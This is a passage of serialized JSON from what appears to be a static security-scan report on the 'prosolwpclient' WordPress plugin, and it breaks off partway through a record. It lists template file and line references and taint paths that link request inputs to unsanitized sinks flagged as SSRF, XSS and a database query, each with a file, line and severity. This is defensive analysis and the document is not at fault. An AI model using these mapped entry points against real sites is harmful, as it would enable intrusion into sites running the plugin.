line":568,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobsearchform.php",101,{"file":567,"line":570,"context":247},147,{"file":567,"line":572,"context":247},155,{"file":567,"line":574,"context":247},182,{"file":567,"line":576,"context":247},184,{"file":567,"line":578,"context":247},196,{"file":567,"line":580,"context":247},226,{"file":567,"line":582,"context":247},249,{"file":567,"line":238,"context":247},{"file":567,"line":518,"context":247},{"file":567,"line":586,"context":247},275,{"file":567,"line":449,"context":247},{"file":567,"line":589,"context":247},443,{"file":567,"line":220,"context":247},{"file":567,"line":592,"context":247},508,{"file":567,"line":594,"context":247},514,{"file":
567,"line":550,"context":247},{"file":567,"line":597,"context":247},520,{"file":567,"line":599,"context":247},522,{"file":567,"line":601,"context":247},523,{"file":567,"line":603,"context":247},525,{"file":567,"line":552,"context":247},{"file":567,"line":606,"context":247},527,{"file":567,"line":608,"context":247},570,{"file":567,"line":610,"context":247},573,{"file":567,"line":612,"context":247},574,{"file":567,"line":614,"context":247},580,{"file":567,"line":614,"context":247},{"file":567,"line":617,"context":247},650,{"file":567,"line":619,"context":247},660,{"file":567,"line":621,"context":247},661,{"file":567,"line":623,"context":247},662,{"file":567,"line":625,"context":247},663,{"file":567,"line":627,"context":247},666,{"file":567,"line":629,"context":247},671,{"file":567,"line":631,"context":247},672,{"file":633,"line":26,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobsearchform_ori.php",{"file":633,"line":422,"context":247},{"file":633,"line":636,"context":247},146,{"file":633,"line":638,"context":247},173,{"file":633,"line":640,"context":247},175,{"file":633,"line":642,"context":247},187,{"file":633,"line":644,"context":247},217,{"file":633,"line":646,"context":247},240,{"file":633,"line":648,"context":247},241,{"file":633,"line":650,"context":247},252,{"file":633,"line":652,"context":247},265,{"file":633,"line":654,"context":247},332,{"file":633,"line":656,"context":247},337,{"file":633,"line":201,"context":247},{"file":633,"line":659,"context":247},365,{"file":633,"line":661,"context":247},370,{"file":633,"line":663,"context":247},371,{"file":633,"line":665,"context":247},373,{"file":633,"line":667,"context":247},374,{"file":633,"line":669,"context":247},376,{"file":633,"line":671,"context":247},377,{"file":633,"line":673,"context":247},378,{"file":633,"line":675,"context":247},454,{"file":677,"line":280,"context":247},"public\u002Ftemplates\u002Fprosolwpclientjobsearchresult.php",{"file":677,"line":424,"context":247},{"file":677,"line":570,
"context":247},{"file":677,"line":228,"context":247},{"file":677,"line":682,"context":247},149,{"file":677,"line":684,"context":247},154,{"file":677,"line":686,"context":247},158,{"file":677,"line":688,"context":247},159,{"file":677,"line":428,"context":247},{"file":677,"line":691,"context":247},178,{"file":677,"line":574,"context":247},{"file":694,"line":695,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fmodals\u002Fprosolwpclientjobapplicationactivitymodal.php",49,{"file":694,"line":697,"context":247},59,{"file":699,"line":695,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fmodals\u002Fprosolwpclientjobapplicationbusinessmodal.php",{"file":699,"line":701,"context":247},60,{"file":703,"line":704,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fmodals\u002Fprosolwpclientjobapplicationjobmodal.php",35,{"file":703,"line":706,"context":247},45,{"file":708,"line":695,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-education-info_main.php",{"file":708,"line":695,"context":247},{"file":708,"line":711,"context":247},76,{"file":708,"line":711,"context":247},{"file":708,"line":714,"context":247},93,{"file":708,"line":714,"context":247},{"file":708,"line":717,"context":247},128,{"file":708,"line":717,"context":247},{"file":708,"line":262,"context":247},{"file":708,"line":262,"context":247},{"file":708,"line":722,"context":247},157,{"file":708,"line":722,"context":247},{"file":708,"line":725,"context":247},233,{"file":708,"line":725,"context":247},{"file":708,"line":728,"context":247},259,{"file":708,"line":728,"context":247},{"file":708,"line":586,"context":247},{"file":708,"line":586,"context":247},{"file":708,"line":733,"context":247},307,{"file":708,"line":733,"context":247},{"file":708,"line":736,"context":247},321,{"file":708,"line":736,"context":247},{"file":708,"line":739,"context":247},335,{"file":708,"line":739,"context":247},{"file":742,"line":743,"context":247},"public\u002Ft
emplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_bk_25_6_18.php",53,{"file":742,"line":743,"context":247},{"file":742,"line":746,"context":247},69,{"file":742,"line":746,"context":247},{"file":742,"line":749,"context":247},87,{"file":742,"line":749,"context":247},{"file":742,"line":752,"context":247},152,{"file":742,"line":752,"context":247},{"file":742,"line":755,"context":247},167,{"file":742,"line":755,"context":247},{"file":742,"line":574,"context":247},{"file":742,"line":574,"context":247},{"file":742,"line":578,"context":247},{"file":742,"line":578,"context":247},{"file":742,"line":762,"context":247},210,{"file":742,"line":762,"context":247},{"file":742,"line":725,"context":247},{"file":742,"line":725,"context":247},{"file":742,"line":767,"context":247},247,{"file":742,"line":767,"context":247},{"file":742,"line":770,"context":247},264,{"file":742,"line":770,"context":247},{"file":742,"line":773,"context":247},326,{"file":742,"line":773,"context":247},{"file":742,"line":776,"context":247},340,{"file":742,"line":776,"context":247},{"file":742,"line":779,"context":247},354,{"file":742,"line":779,"context":247},{"file":742,"line":782,"context":247},368,{"file":742,"line":782,"context":247},{"file":742,"line":785,"context":247},382,{"file":742,"line":785,"context":247},{"file":788,"line":743,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_m.php",{"file":788,"line":743,"context":247},{"file":788,"line":791,"context":247},68,{"file":788,"line":791,"context":247},{"file":788,"line":152,"context":247},{"file":788,"line":152,"context":247},{"file":788,"line":682,"context":247},{"file":788,"line":682,"context":247},{"file":788,"line":798,"context":247},164,{"file":788,"line":798,"context":247},{"file":788,"line":691,"context":247},{"file":788,"line":691,"context":247},{"file":788,"line":803,"context":247},192,{"file":788,"line":803,"context":247},{"file":788,"line":806,"context
":247},206,{"file":788,"line":806,"context":247},{"file":788,"line":809,"context":247},300,{"file":788,"line":809,"context":247},{"file":788,"line":812,"context":247},314,{"file":788,"line":812,"context":247},{"file":788,"line":815,"context":247},331,{"file":788,"line":815,"context":247},{"file":788,"line":818,"context":247},393,{"file":788,"line":818,"context":247},{"file":788,"line":821,"context":247},407,{"file":788,"line":821,"context":247},{"file":788,"line":824,"context":247},421,{"file":788,"line":824,"context":247},{"file":788,"line":827,"context":247},435,{"file":788,"line":827,"context":247},{"file":788,"line":830,"context":247},449,{"file":788,"line":830,"context":247},{"file":833,"line":743,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_main.php",{"file":833,"line":743,"context":247},{"file":833,"line":746,"context":247},{"file":833,"line":746,"context":247},{"file":833,"line":749,"context":247},{"file":833,"line":749,"context":247},{"file":833,"line":752,"context":247},{"file":833,"line":752,"context":247},{"file":833,"line":755,"context":247},{"file":833,"line":755,"context":247},{"file":833,"line":574,"context":247},{"file":833,"line":574,"context":247},{"file":833,"line":578,"context":247},{"file":833,"line":578,"context":247},{"file":833,"line":762,"context":247},{"file":833,"line":762,"context":247},{"file":833,"line":725,"context":247},{"file":833,"line":725,"context":247},{"file":833,"line":767,"context":247},{"file":833,"line":767,"context":247},{"file":833,"line":770,"context":247},{"file":833,"line":770,"context":247},{"file":833,"line":773,"context":247},{"file":833,"line":773,"context":247},{"file":833,"line":776,"context":247},{"file":833,"line":776,"context":247},{"file":833,"line":779,"context":247},{"file":833,"line":779,"context":247},{"file":833,"line":782,"context":247},{"file":833,"line":782,"context":247},{"file":833,"line":785,"context":247},{"file":833,"line":785,"cont
ext":247},{"file":866,"line":743,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_mainfile.php",{"file":866,"line":743,"context":247},{"file":866,"line":746,"context":247},{"file":866,"line":746,"context":247},{"file":866,"line":749,"context":247},{"file":866,"line":749,"context":247},{"file":866,"line":752,"context":247},{"file":866,"line":752,"context":247},{"file":866,"line":755,"context":247},{"file":866,"line":755,"context":247},{"file":866,"line":574,"context":247},{"file":866,"line":574,"context":247},{"file":866,"line":578,"context":247},{"file":866,"line":578,"context":247},{"file":866,"line":762,"context":247},{"file":866,"line":762,"context":247},{"file":866,"line":725,"context":247},{"file":866,"line":725,"context":247},{"file":866,"line":767,"context":247},{"file":866,"line":767,"context":247},{"file":866,"line":770,"context":247},{"file":866,"line":770,"context":247},{"file":866,"line":773,"context":247},{"file":866,"line":773,"context":247},{"file":866,"line":776,"context":247},{"file":866,"line":776,"context":247},{"file":866,"line":779,"context":247},{"file":866,"line":779,"context":247},{"file":866,"line":782,"context":247},{"file":866,"line":782,"context":247},{"file":866,"line":785,"context":247},{"file":866,"line":785,"context":247},{"file":899,"line":743,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclient-job-application-experience-info_pratikfile.php",{"file":899,"line":743,"context":247},{"file":899,"line":791,"context":247},{"file":899,"line":791,"context":247},{"file":899,"line":152,"context":247},{"file":899,"line":152,"context":247},{"file":899,"line":682,"context":247},{"file":899,"line":682,"context":247},{"file":899,"line":798,"context":247},{"file":899,"line":798,"context":247},{"file":899,"line":691,"context":247},{"file":899,"line":691,"context":247},{"file":899,"line":803,"context":247},{"file":899,"line":803,"context":247},{"file":899,"line":806
,"context":247},{"file":899,"line":806,"context":247},{"file":899,"line":434,"context":247},{"file":899,"line":434,"context":247},{"file":899,"line":918,"context":247},309,{"file":899,"line":918,"context":247},{"file":899,"line":773,"context":247},{"file":899,"line":773,"context":247},{"file":899,"line":923,"context":247},388,{"file":899,"line":923,"context":247},{"file":899,"line":440,"context":247},{"file":899,"line":440,"context":247},{"file":899,"line":928,"context":247},416,{"file":899,"line":928,"context":247},{"file":899,"line":931,"context":247},430,{"file":899,"line":931,"context":247},{"file":899,"line":934,"context":247},444,{"file":899,"line":934,"context":247},{"file":937,"line":697,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationeducationinfo.php",{"file":937,"line":697,"context":247},{"file":937,"line":80,"context":247},{"file":937,"line":80,"context":247},{"file":937,"line":942,"context":247},107,{"file":937,"line":942,"context":247},{"file":937,"line":945,"context":247},116,{"file":937,"line":947,"context":247},118,{"file":937,"line":949,"context":247},123,{"file":937,"line":951,"context":247},129,{"file":937,"line":953,"context":247},133,{"file":937,"line":955,"context":247},135,{"file":937,"line":957,"context":247},139,{"file":937,"line":957,"context":247},{"file":937,"line":424,"context":247},{"file":937,"line":424,"context":247},{"file":937,"line":428,"context":247},{"file":937,"line":428,"context":247},{"file":937,"line":964,"context":247},166,{"file":937,"line":966,"context":247},168,{"file":937,"line":968,"context":247},172,{"file":937,"line":970,"context":247},176,{"file":937,"line":970,"context":247},{"file":937,"line":973,"context":247},220,{"file":937,"line":975,"context":247},222,{"file":937,"line":580,"context":247},{"file":937,"line":978,"context":247},234,{"file":937,"line":980,"context":247},857,{"file":937,"line":980,"context":247},{"file":937,"line":983,"context":247},889,{"file":937,"line
":983,"context":247},{"file":937,"line":986,"context":247},908,{"file":937,"line":986,"context":247},{"file":937,"line":989,"context":247},917,{"file":937,"line":991,"context":247},919,{"file":937,"line":993,"context":247},924,{"file":937,"line":993,"context":247},{"file":937,"line":996,"context":247},929,{"file":937,"line":996,"context":247},{"file":937,"line":999,"context":247},933,{"file":937,"line":1001,"context":247},935,{"file":937,"line":1003,"context":247},939,{"file":937,"line":1003,"context":247},{"file":937,"line":1003,"context":247},{"file":937,"line":1007,"context":247},944,{"file":937,"line":1007,"context":247},{"file":937,"line":1010,"context":247},960,{"file":937,"line":1010,"context":247},{"file":937,"line":1013,"context":247},966,{"file":937,"line":1015,"context":247},968,{"file":937,"line":1017,"context":247},972,{"file":937,"line":1017,"context":247},{"file":937,"line":1020,"context":247},976,{"file":937,"line":1020,"context":247},{"file":937,"line":1023,"context":247},1014,{"file":937,"line":1025,"context":247},1016,{"file":937,"line":1027,"context":247},1020,{"file":937,"line":1027,"context":247},{"file":1030,"line":1031,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationexperienceinfo.php",52,{"file":1030,"line":1033,"context":247},54,{"file":1030,"line":1035,"context":247},58,{"file":1030,"line":1037,"context":247},62,{"file":1030,"line":1037,"context":247},{"file":1030,"line":1040,"context":247},78,{"file":1030,"line":1040,"context":247},{"file":1030,"line":418,"context":247},{"file":1030,"line":418,"context":247},{"file":1030,"line":945,"context":247},{"file":1030,"line":947,"context":247},{"file":1030,"line":1047,"context":247},122,{"file":1030,"line":1049,"context":247},126,{"file":1030,"line":717,"context":247},{"file":1030,"line":1052,"context":247},132,{"file":1030,"line":1054,"context":247},137,{"file":1030,"line":957,"context":247},{"file":1030,"line":424,"context":247},{"file":1030,"line":1058
,"context":247},150,{"file":1030,"line":684,"context":247},{"file":1030,"line":426,"context":247},{"file":1030,"line":428,"context":247},{"file":1030,"line":428,"context":247},{"file":1030,"line":430,"context":247},{"file":1030,"line":430,"context":247},{"file":1030,"line":1066,"context":247},171,{"file":1030,"line":638,"context":247},{"file":1030,"line":1069,"context":247},177,{"file":1030,"line":1071,"context":247},181,{"file":1030,"line":1071,"context":247},{"file":1030,"line":642,"context":247},{"file":1030,"line":1075,"context":247},189,{"file":1030,"line":1077,"context":247},193,{"file":1030,"line":578,"context":247},{"file":1030,"line":578,"context":247},{"file":1030,"line":1081,"context":247},202,{"file":1030,"line":1083,"context":247},204,{"file":1030,"line":1085,"context":247},208,{"file":1030,"line":1087,"context":247},212,{"file":1030,"line":1087,"context":247},{"file":1030,"line":506,"context":247},{"file":1030,"line":973,"context":247},{"file":1030,"line":1092,"context":247},224,{"file":1030,"line":1094,"context":247},228,{"file":1030,"line":1094,"context":247},{"file":1030,"line":512,"context":247},{"file":1030,"line":565,"context":247},{"file":1030,"line":1099,"context":247},552,{"file":1030,"line":455,"context":247},{"file":1030,"line":455,"context":247},{"file":1030,"line":463,"context":247},{"file":1030,"line":463,"context":247},{"file":1030,"line":1105,"context":247},576,{"file":1030,"line":1105,"context":247},{"file":1030,"line":477,"context":247},{"file":1030,"line":477,"context":247},{"file":1030,"line":1110,"context":247},614,{"file":1030,"line":1112,"context":247},616,{"file":1030,"line":485,"context":247},{"file":1030,"line":485,"context":247},{"file":1030,"line":1116,"context":247},624,{"file":1030,"line":1118,"context":247},626,{"file":1030,"line":1120,"context":247},630,{"file":1030,"line":1120,"context":247},{"file":1030,"line":1123,"context":247},635,{"file":1030,"line":491,"context":247},{"file":1030,"line":1126,"context":247},642,{"f
ile":1030,"line":1126,"context":247},{"file":1030,"line":1129,"context":247},648,{"file":1030,"line":1129,"context":247},{"file":1030,"line":1132,"context":247},652,{"file":1030,"line":1134,"context":247},654,{"file":1030,"line":1136,"context":247},658,{"file":1030,"line":1136,"context":247},{"file":1030,"line":1136,"context":247},{"file":1030,"line":625,"context":247},{"file":1030,"line":625,"context":247},{"file":1030,"line":1142,"context":247},669,{"file":1030,"line":629,"context":247},{"file":1030,"line":1145,"context":247},675,{"file":1030,"line":1145,"context":247},{"file":1030,"line":1148,"context":247},679,{"file":1030,"line":1148,"context":247},{"file":1030,"line":1151,"context":247},685,{"file":1030,"line":1153,"context":247},687,{"file":1030,"line":1155,"context":247},691,{"file":1030,"line":1155,"context":247},{"file":1030,"line":1158,"context":247},694,{"file":1030,"line":1158,"context":247},{"file":1030,"line":1161,"context":247},700,{"file":1030,"line":1163,"context":247},702,{"file":1030,"line":1165,"context":247},706,{"file":1030,"line":1165,"context":247},{"file":1030,"line":1168,"context":247},710,{"file":1030,"line":1168,"context":247},{"file":1030,"line":1171,"context":247},716,{"file":1030,"line":1173,"context":247},718,{"file":1030,"line":1175,"context":247},722,{"file":1030,"line":1175,"context":247},{"file":1030,"line":1178,"context":247},726,{"file":1030,"line":1178,"context":247},{"file":1181,"line":711,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationexpertiseinfo.php",{"file":1181,"line":1183,"context":247},77,{"file":1181,"line":413,"context":247},{"file":1181,"line":1186,"context":247},117,{"file":1181,"line":1186,"context":247},{"file":1181,"line":510,"context":247},{"file":1190,"line":254,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationothersinfo.php",{"file":1190,"line":1192,"context":247},27,{"file":1190,"line":268,"context":247},{"file":1190,"line
":704,"context":247},{"file":1190,"line":704,"context":247},{"file":1190,"line":1197,"context":247},41,{"file":1190,"line":1199,"context":247},43,{"file":1190,"line":1201,"context":247},47,{"file":1190,"line":1031,"context":247},{"file":1190,"line":1033,"context":247},{"file":1190,"line":1035,"context":247},{"file":1206,"line":1207,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationpersonalinfo.php",84,{"file":1206,"line":411,"context":247},{"file":1206,"line":1210,"context":247},89,{"file":1206,"line":111,"context":247},{"file":1206,"line":67,"context":247},{"file":1206,"line":67,"context":247},{"file":1206,"line":722,"context":247},{"file":1206,"line":722,"context":247},{"file":1206,"line":1217,"context":247},163,{"file":1206,"line":964,"context":247},{"file":1206,"line":1220,"context":247},169,{"file":1206,"line":638,"context":247},{"file":1206,"line":638,"context":247},{"file":1206,"line":1224,"context":247},179,{"file":1206,"line":1071,"context":247},{"file":1206,"line":576,"context":247},{"file":1206,"line":803,"context":247},{"file":1206,"line":1229,"context":247},194,{"file":1206,"line":1231,"context":247},197,{"file":1206,"line":1081,"context":247},{"file":1206,"line":1083,"context":247},{"file":1206,"line":1235,"context":247},207,{"file":1206,"line":1087,"context":247},{"file":1206,"line":1238,"context":247},214,{"file":1206,"line":644,"context":247},{"file":1206,"line":975,"context":247},{"file":1206,"line":1092,"context":247},{"file":1206,"line":1243,"context":247},227,{"file":1206,"line":432,"context":247},{"file":1206,"line":432,"context":247},{"file":1206,"line":512,"context":247},{"file":1206,"line":646,"context":247},{"file":1206,"line":514,"context":247},{"file":1206,"line":1250,"context":247},248,{"file":1206,"line":1250,"context":247},{"file":1206,"line":1253,"context":247},254,{"file":1206,"line":1255,"context":247},256,{"file":1206,"line":1257,"context":247},260,{"file":1206,"line":652,"context":247},{"fi
le":1206,"line":1260,"context":247},269,{"file":1206,"line":1262,"context":247},270,{"file":1206,"line":1264,"context":247},277,{"file":1206,"line":1266,"context":247},279,{"file":1206,"line":1268,"context":247},282,{"file":1206,"line":1270,"context":247},286,{"file":1206,"line":1270,"context":247},{"file":1206,"line":812,"context":247},{"file":1206,"line":1274,"context":247},316,{"file":1206,"line":1276,"context":247},320,{"file":1206,"line":773,"context":247},{"file":1206,"line":1279,"context":247},328,{"file":1206,"line":815,"context":247},{"file":1206,"line":1282,"context":247},339,{"file":1206,"line":1284,"context":247},341,{"file":1206,"line":1286,"context":247},345,{"file":1206,"line":289,"context":247},{"file":1206,"line":289,"context":247},{"file":1206,"line":289,"context":247},{"file":1206,"line":289,"context":247},{"file":1206,"line":1292,"context":247},360,{"file":1206,"line":1292,"context":247},{"file":1206,"line":1292,"context":247},{"file":1206,"line":782,"context":247},{"file":1206,"line":782,"context":247},{"file":1206,"line":782,"context":247},{"file":1206,"line":782,"context":247},{"file":1206,"line":661,"context":247},{"file":1206,"line":661,"context":247},{"file":1206,"line":661,"context":247},{"file":1206,"line":671,"context":247},{"file":1206,"line":671,"context":247},{"file":1206,"line":785,"context":247},{"file":1206,"line":785,"context":247},{"file":1206,"line":291,"context":247},{"file":1206,"line":291,"context":247},{"file":1206,"line":1309,"context":247},397,{"file":1206,"line":1311,"context":247},399,{"file":1206,"line":1311,"context":247},{"file":1206,"line":1314,"context":247},400,{"file":1206,"line":440,"context":247},{"file":1206,"line":440,"context":247},{"file":1206,"line":1318,"context":247},403,{"file":1206,"line":1320,"context":247},426,{"file":1322,"line":268,"context":247},"public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationsidedishesinfo.php",11,[1325],{"name":1326,"version":36,"knownCves":1327},"jQue
ry",[],[1329,1347,1365,1380,1403,1427,1445,1455,1467,1476,1485,1495,1505,1515,1529,1537,1549,1571],{"entryPoint":1330,"graph":1331,"unsanitizedCount":27,"severity":1346},"proSol_url_validate (admin\u002Fclass-prosolwpclient-admin.php:382)",{"nodes":1332,"edges":1344},[1333,1338],{"id":1334,"type":1335,"label":1336,"file":245,"line":1337},"n0","source","$_POST",384,{"id":1339,"type":1340,"label":1341,"file":245,"line":1342,"wp_function":1343},"n1","sink","wp_remote_get() [SSRF]",394,"wp_remote_get",[1345],{"from":1334,"to":1339,"sanitized":49},"medium",{"entryPoint":1348,"graph":1349,"unsanitizedCount":50,"severity":1346},"proSol_apiActivity (includes\u002Fclass-prosolwpclient-table-helper.php:76)",{"nodes":1350,"edges":1362},[1351,1354,1357,1360],{"id":1334,"type":1335,"label":1352,"file":200,"line":1353},"$_COOKIE",83,{"id":1339,"type":1340,"label":1355,"file":200,"line":420,"wp_function":1356},"wp_remote_post() [SSRF]","wp_remote_post",{"id":1358,"type":1335,"label":1359,"file":200,"line":1353},"n2","$_COOKIE (x2)",{"id":1361,"type":1340,"label":1341,"file":200,"line":957,"wp_function":1343},"n3",[1363,1364],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"entryPoint":1366,"graph":1367,"unsanitizedCount":50,"severity":1346},"proSol_prosolwpclientShortcode (public\u002Fclass-prosolwpclient-public.php:205)",{"nodes":1368,"edges":1377},[1369,1372,1373,1375],{"id":1334,"type":1335,"label":1370,"file":179,"line":1371},"$_GET",219,{"id":1339,"type":1340,"label":1355,"file":179,"line":535,"wp_function":1356},{"id":1358,"type":1335,"label":1374,"file":179,"line":1371},"$_GET (x2)",{"id":1361,"type":1340,"label":1341,"file":179,"line":1376,"wp_function":1343},472,[1378,1379],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"entryPoint":1381,"graph":1382,"unsanitizedCount":1402,"severity":1346},"\u003Cprosolwpclientjobapply> 
(public\u002Ftemplates\u002Fprosolwpclientjobapply.php:0)",{"nodes":1383,"edges":1398},[1384,1387,1390,1392,1393,1396],{"id":1334,"type":1335,"label":1385,"file":407,"line":1386},"$_GET (x19)",38,{"id":1339,"type":1340,"label":1388,"file":407,"line":408,"wp_function":1389},"echo() [XSS]","echo",{"id":1358,"type":1335,"label":1391,"file":407,"line":1386},"$_GET (x3)",{"id":1361,"type":1340,"label":1341,"file":407,"line":220,"wp_function":1343},{"id":1394,"type":1335,"label":1395,"file":407,"line":489},"n4","$_SERVER['PHP_SELF']",{"id":1397,"type":1340,"label":1388,"file":407,"line":489,"wp_function":1389},"n5",[1399,1400,1401],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"from":1394,"to":1397,"sanitized":49},23,{"entryPoint":1404,"graph":1405,"unsanitizedCount":161,"severity":1346},"\u003Cprosolwpclientjobsearchform> (public\u002Ftemplates\u002Fprosolwpclientjobsearchform.php:0)",{"nodes":1406,"edges":1422},[1407,1409,1411,1413,1414,1416,1417,1420],{"id":1334,"type":1335,"label":1370,"file":567,"line":1408},26,{"id":1339,"type":1340,"label":1341,"file":567,"line":1410,"wp_function":1343},73,{"id":1358,"type":1335,"label":1412,"file":567,"line":1408},"$_GET (x7)",{"id":1361,"type":1340,"label":1388,"file":567,"line":570,"wp_function":1389},{"id":1394,"type":1335,"label":1415,"file":567,"line":597},"$_POST['jobname']",{"id":1397,"type":1340,"label":1388,"file":567,"line":597,"wp_function":1389},{"id":1418,"type":1335,"label":1419,"file":567,"line":601},"n6","$_POST['searchplace']",{"id":1421,"type":1340,"label":1388,"file":567,"line":601,"wp_function":1389},"n7",[1423,1424,1425,1426],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"from":1394,"to":1397,"sanitized":49},{"from":1418,"to":1421,"sanitized":49},{"entryPoint":1428,"graph":1429,"unsanitizedCount":143,"severity":1346},"\u003Cprosolwpclientjobsearchform_ori> 
(public\u002Ftemplates\u002Fprosolwpclientjobsearchform_ori.php:0)",{"nodes":1430,"edges":1440},[1431,1432,1434,1435,1436,1437,1438,1439],{"id":1334,"type":1335,"label":1370,"file":633,"line":254},{"id":1339,"type":1340,"label":1341,"file":633,"line":1433,"wp_function":1343},66,{"id":1358,"type":1335,"label":1391,"file":633,"line":254},{"id":1361,"type":1340,"label":1388,"file":633,"line":422,"wp_function":1389},{"id":1394,"type":1335,"label":1415,"file":633,"line":663},{"id":1397,"type":1340,"label":1388,"file":633,"line":663,"wp_function":1389},{"id":1418,"type":1335,"label":1419,"file":633,"line":667},{"id":1421,"type":1340,"label":1388,"file":633,"line":667,"wp_function":1389},[1441,1442,1443,1444],{"from":1334,"to":1339,"sanitized":49},{"from":1358,"to":1361,"sanitized":49},{"from":1394,"to":1397,"sanitized":49},{"from":1418,"to":1421,"sanitized":49},{"entryPoint":1446,"graph":1447,"unsanitizedCount":13,"severity":1454},"proSol_ajaxClearlog (admin\u002Fclass-prosolwpclient-admin.php:345)",{"nodes":1448,"edges":1452},[1449,1451],{"id":1334,"type":1335,"label":1336,"file":245,"line":1450},349,{"id":1339,"type":1340,"label":1388,"file":245,"line":249,"wp_function":1389},[1453],{"from":1334,"to":1339,"sanitized":65},"low",{"entryPoint":1456,"graph":1457,"unsanitizedCount":13,"severity":1454},"\u003Cclass-prosolwpclient-admin> (admin\u002Fclass-prosolwpclient-admin.php:0)",{"nodes":1458,"edges":1464},[1459,1461,1462,1463],{"id":1334,"type":1335,"label":1460,"file":245,"line":1450},"$_POST (x2)",{"id":1339,"type":1340,"label":1388,"file":245,"line":249,"wp_function":1389},{"id":1358,"type":1335,"label":1336,"file":245,"line":1337},{"id":1361,"type":1340,"label":1341,"file":245,"line":1342,"wp_function":1343},[1465,1466],{"from":1334,"to":1339,"sanitized":65},{"from":1358,"to":1361,"sanitized":65},{"entryPoint":1468,"graph":1469,"unsanitizedCount":13,"severity":1454},"\u003Cadmin-overview> 
(admin\u002Ftemplates\u002Fadmin-overview.php:0)",{"nodes":1470,"edges":1474},[1471,1473],{"id":1334,"type":1335,"label":1472,"file":253,"line":262},"$_SERVER['REQUEST_URI'] (x2)",{"id":1339,"type":1340,"label":1388,"file":253,"line":262,"wp_function":1389},[1475],{"from":1334,"to":1339,"sanitized":65},{"entryPoint":1477,"graph":1478,"unsanitizedCount":27,"severity":1454},"\u003Cadmin-view-single-table-list> (admin\u002Ftemplates\u002Fadmin-view-single-table-list.php:0)",{"nodes":1479,"edges":1483},[1480,1482],{"id":1334,"type":1335,"label":1481,"file":272,"line":152},"$_REQUEST['page']",{"id":1339,"type":1340,"label":1388,"file":272,"line":152,"wp_function":1389},[1484],{"from":1334,"to":1339,"sanitized":49},{"entryPoint":1486,"graph":1487,"unsanitizedCount":13,"severity":1454},"proSol_prosolwpclientFrontendFormsubmit (public\u002Fclass-prosolwpclient-public.php:529)",{"nodes":1488,"edges":1493},[1489,1491],{"id":1334,"type":1335,"label":1370,"file":179,"line":1490},535,{"id":1339,"type":1340,"label":1355,"file":179,"line":1492,"wp_function":1356},680,[1494],{"from":1334,"to":1339,"sanitized":65},{"entryPoint":1496,"graph":1497,"unsanitizedCount":13,"severity":1454},"proSol_goupDataIdCallback (public\u002Fclass-prosolwpclient-public.php:801)",{"nodes":1498,"edges":1503},[1499,1502],{"id":1334,"type":1335,"label":1500,"file":179,"line":1501},"$_REQUEST (x2)",806,{"id":1339,"type":1340,"label":1388,"file":179,"line":364,"wp_function":1389},[1504],{"from":1334,"to":1339,"sanitized":65},{"entryPoint":1506,"graph":1507,"unsanitizedCount":13,"severity":1454},"proSol_applicationSubmitProcess 
(public\u002Fclass-prosolwpclient-public.php:1266)",{"nodes":1508,"edges":1513},[1509,1511],{"id":1334,"type":1335,"label":1370,"file":179,"line":1510},1270,{"id":1339,"type":1340,"label":1355,"file":179,"line":1512,"wp_function":1356},2035,[1514],{"from":1334,"to":1339,"sanitized":65},{"entryPoint":1516,"graph":1517,"unsanitizedCount":13,"severity":1454},"\u003Cclass-prosolwpclient-public> (public\u002Fclass-prosolwpclient-public.php:0)",{"nodes":1518,"edges":1525},[1519,1520,1521,1522,1523,1524],{"id":1334,"type":1335,"label":1391,"file":179,"line":1371},{"id":1339,"type":1340,"label":1355,"file":179,"line":535,"wp_function":1356},{"id":1358,"type":1335,"label":1374,"file":179,"line":1371},{"id":1361,"type":1340,"label":1341,"file":179,"line":1376,"wp_function":1343},{"id":1394,"type":1335,"label":1500,"file":179,"line":1501},{"id":1397,"type":1340,"label":1388,"file":179,"line":364,"wp_function":1389},[1526,1527,1528],{"from":1334,"to":1339,"sanitized":65},{"from":1358,"to":1361,"sanitized":65},{"from":1394,"to":1397,"sanitized":65},{"entryPoint":1530,"graph":1531,"unsanitizedCount":27,"severity":1454},"\u003Cprosolwpclientjobapplicationexpertiseinfo> (public\u002Ftemplates\u002Fsinglefieldset\u002Fprosolwpclientjobapplicationexpertiseinfo.php:0)",{"nodes":1532,"edges":1535},[1533,1534],{"id":1334,"type":1335,"label":1370,"file":1181,"line":161},{"id":1339,"type":1340,"label":1388,"file":1181,"line":510,"wp_function":1389},[1536],{"from":1334,"to":1339,"sanitized":49},{"entryPoint":1538,"graph":1539,"unsanitizedCount":27,"severity":1548},"proSol_allTablesInsertion (includes\u002Fclass-prosolwpclient-table-helper.php:368)",{"nodes":1540,"edges":1546},[1541,1542],{"id":1334,"type":1335,"label":1352,"file":200,"line":671},{"id":1339,"type":1340,"label":1543,"file":200,"line":1544,"wp_function":1545},"get_var() 
